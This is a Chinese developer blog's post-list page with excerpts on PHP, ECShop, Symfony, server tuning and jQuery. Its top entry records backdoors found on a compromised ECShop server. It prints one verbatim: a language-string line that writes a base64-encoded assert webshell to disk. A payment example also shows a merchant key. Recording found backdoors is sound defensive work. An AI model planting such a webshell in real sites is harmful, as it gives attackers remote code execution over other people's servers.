2014年6月4日一些ECShop后门

有个服务器没怎么管它,发现磁盘莫名奇妙的全满了。上面是一些ECShop商城,很久没更新了。ECShop本来漏洞就比较多,国内用的也多,估计好多人没事都在扫吧。。。


发现一些后门,记录下:


$_LANG['is_paid'] = "状态${${fputs(fopen(base64_decode(aW5kZS5waHA),w),base64_decode(PD9waHAgJGsgPSBzdHJfcmVwbGFjZSgiOSIsIiIsImE5czk5czllOXI5dCIpOyRrKCRfUE9TVFsiOSJdKTsgPz4))}}";

...

分类:网站相关  标签:ecshop.后门  木马    网友评论0条  已浏览loading

2014年4月22日PHP-CPP - 利用C++开发PHP扩展

PHP-CPP是一个用来开发PHP扩展的C++库,下面引用自官方介绍:


The PHP-CPP library is a C++ library for developing PHP extensions. It offers a collection of well documented and easy-to-use classes that can be used and extended to build native extensions for PHP.


1.安装PHP-CPP


PHP-CPP目前只支持Linux系统和OSX,我这里用的是CentOS 6.0。

分类:网站相关  标签:PHP-CPP    网友评论0条  已浏览loading

2014年3月30日Symfony 2.4.2 ParameterNotFoundException 错误

google搜索了下,折腾了一会才找到这个帖子:http://forum.symfony-project.org/viewtopic.php?t=68531


留个档!


错误描述:



ParameterNotFoundException: You have requested a non-existent parameter "kernel.debug".

...

分类:网站相关  标签:symfony    网友评论0条  已浏览loading

2013年1月24日ECShop的几个小瑕疵

 1、includes/lib_base.php文件中的gd_version()函数

此函数是直接静态调用cls_image类中的gd_version方法,原始代码:return cls_image::gd_version();因为cls_image类中的gd_version非静态方法,这样调用会出现Strict级别错误:

Strict Standards: Non-static method cls_image::gd_version() should not be called statically

...

分类:网站相关  标签:ECShop    网友评论0条  已浏览loading

2013年1月21日环迅在线支付银行直连获取银行编号php示例


官方文档只有asp的例子。环迅的这个用的SOAP,参数传输文档也没说明,有点坑爹。。。摸索了下,在php下面可以用如下代码实现:
注:php需安装SOAP扩展。

<?php
header('content-type:text/html;charset=utf-8');

$Mer_code = '000166';
$Mer_key = 'cQ0YAtyVNoiEeKrZJ5F5Qp2pMohwspfv6XoiU3wHYtcc1YOEhJ3SjDVMylmwmbD7jMhg5ifqjX67mzNN02p8MmlSb1KIqa5XF4TEQHjZEmJmhyAYxyVJMeLWBofdxwaj';
...

分类:网站相关  标签:环迅  PHP  银行直连    网友评论1条  已浏览loading

2013年1月16日一些Apache、Php和Mysql的优化配置选项

 1、apache

apache的配置文件:httpd.conf
HostnameLookups
语法:HostnameLookups On|Off|Double
默认:HostnameLookups Off
此选项可用来配置是否在客户端IP上启用DNS查询,一般设为off。
 
KeepAlive
语法:KeepAlive On|Off

...

分类:网站相关  标签:Apache  PHP  Mysql  优化    网友评论0条  已浏览loading

2012年12月24日php socket编程实例

因为用到客户端程序与网页三方支付接口交互,我觉得可以这样来实现,在三方支付回调页面中放一个socket服务端,客户端程序与这个socket服务端进行交互,以此来进行最终业务逻辑处理。

php中socket编程,简单实例代码如下:

服务端:...

分类:网站相关  标签:PHP  socket    网友评论0条  已浏览loading

2012年12月21日php购物车类的简单实现


php购物车类的简单实现:

hasItem($id)){
		$item=array();
		$item['id']=$id;
		$item['name']=$name;
		$item['num']=$num;
		$item['price']=$price;
		$this->items[$id]=$item;
		}else{
			$t

分类:网站相关  标签:购物车  PHP    网友评论0条  已浏览loading

2012年12月13日php中缩略图和水印的简单实现

GD库函数的简单应用。

分类:网站相关  标签:PHP  缩略图  水印    网友评论0条  已浏览loading

2012年12月9日php页面采集简单示例

熟悉下正则表达式的运用

<?php
/*
 * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * * *
 */
header('Content-Type:text/html;charset=utf-8');
date_default_timezone_set('PRC');
require './Snoopy.class.php';
if(isset($_POST['submit']) && isset($_POST['url'])){
...

分类:网站相关  标签:PHP  采集  示例    网友评论0条  已浏览loading

2012年11月27日php中字符转义的两种方法


一般在做网站时都需要对用户提交的查询字符串进行转义,以防止sql注入,php中简单的可以用addslashes($str)函数来实现,对于多维数组,需要遍历每个数组元素进行处理,有两种办法:
1、系统自带的相关函数
2、自写函数,用递归处理

分类:网站相关  标签:PHP  字符  转义  递归    网友评论0条  已浏览loading

2012年11月23日PHP中级联目录的打印、创建及删除


PHP中级联目录的打印、创建及删除,主要是运用递归的思想。
[CODE=php]
//级联目录打印
function printDir($dir){
$h=opendir($dir);
while($row=readdir($h)){
if($row=='.' || $row=='..'){
continue;
...

分类:网站相关  标签:PHP  级联目录    网友评论0条  已浏览loading

2012年11月4日php正则表达式入门教程

什么是正则表达式?
从最基本的方面来理解,正则表达式可以被视为一种字符串的模式匹配或匹配模式。在php中,最常用的是PCRE(Perl Compatible Regular Expressions)库。在这里,我们将努力去让你理解那些毫无意义的象形文字(元字符),让你在自己的应用程序中可以使用这样一个强大的工具。不要想着一口气能吃成一个胖子,一点一滴的学习,当你遇到不同的问题时可以回头再来学习它^_

分类:网站相关  标签:PHP  教程  正则    网友评论0条  已浏览loading

2012年10月26日PHP中常用的数组函数

 1.count函数

int count ( mixed $var [, int $mode ] )
计算数组中的单元数目或对象中的属性个数

 

<?php

$season = array (

"春",

"夏",

...

分类:网站相关  标签:PHP  数组  函数    网友评论0条  已浏览loading

2012年10月18日JQuery实现幻灯片上下滚动效果

 原理就是设置外层position为relative,内层position为absolute,然后控制图片的top属性来实现上下滚动效果。

代码如下:

<!DOCTYPE html>

<head>

<script src="jquery/jquery-1.8.0.js"></script>

<script>

function showImg(index){   

...

分类:网站相关  标签:jQuery  幻灯  滚动    网友评论0条  已浏览loading